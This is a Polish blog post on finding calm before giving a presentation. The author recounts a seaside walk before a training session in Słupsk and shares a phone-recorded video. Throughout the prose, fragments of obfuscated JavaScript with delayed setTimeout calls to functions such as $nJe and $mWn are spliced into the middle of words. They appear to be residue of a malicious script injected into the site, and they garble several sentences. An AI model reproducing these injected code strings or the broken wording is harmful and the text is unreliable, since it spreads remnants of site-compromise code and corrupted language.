Znajdź w sobie spokój przed prezentacją [video]

Aby dobrze wypaść, nie możesz na prezentację “iść z marszu”. Zapewne widziałeś spordom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towców, którzy przed zawodami, koncentrują się w samotności. Ty też powinieneś przed ważnym dla Ciebie wydarzeniem, wyciszyć się i zebrać myśli. To może być kilkanaście minut, w ciągu dnia kiedy nic Ci nie przeszkadza i możesz zafundować sobie taki relaks przed prezentacją.

Dwa dni temu, prowadziłem szkolenie w Słupsku. Do hotelu przyjechałem dzień wcześniej i miałem czas aby przed południem wpaść nad morze do Ustki. Spacerując nad morzem, słuchając szumu fal i patrząc na rozbijające się o brzeg fale pomyślałem, że nakręcę dla Ciebie film, podczas którego będziesz mogła/mógł zrelaksować się. Jakość techniczna tego “dzieła” nie jest najlepsza (film nagrywałem aparatem telefonicznym). Myślę jednak, że dobrze oddaje on klimat tego sympatycznego, słonecznego, grudniowego dnia a przede wszystkim jest autentyczny.

I wiesz co Ci powiem? Szkolenie, które tego dnia prowadziłem wypadło, moim zdaniem, znakomicie. I dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to nie przez dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to, że chodząc po plaży myślałem co powiem, jak powiem. Nie powtarzałem sobie treści i scenariusza prezentacji. Powiem więcej – w ogóle o tym nie myślałem. Po prostu cieszyłem się pięknym dniem. Przez te godzinę wyciszyłem się a po południu w świetnym nastroju, stanąłem przed audydom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torium. Dopiero w trakcie szkolenia zauważyłem, że na butach mam odrobinę piasku z plaży…

Jak masz ochotę wybrać się ze mną na spacer, zapraszam:

Przepraszam za słabą jakość materiału. Jest np. lekkie przesunięcie dźwięku w sdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosunku do obrazu, w końcu kręciłem ten film komórką “z ręki” a potem jeszcze go obrabiałem i konwerdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towałem. Wtedy zawsze spada jakość a tu wyjściowa nie była najlepsza.

Robert WarzyńskiO autorze: Robert Ważyński jest autorem książki "Nie boję się mówić" wydanej przez Wydawnictwo Złote Myśli, Jego flagowym przedsięwzięciem jest internetowy kurs "Tajna Księga Mówców" dostępny na platformie interkursy.pl. Na co dzień Robert wyżywa się literacko i filmowo na swoim blogu Tajniki Prezentacji i na YT.

Wpis Ci się podobał?

Świeżutkie artykuły i filmy na temat prezentacji i rozwoju osobistego wprost na Twoją skrzynkę!

2 komentarze

Leave a Reply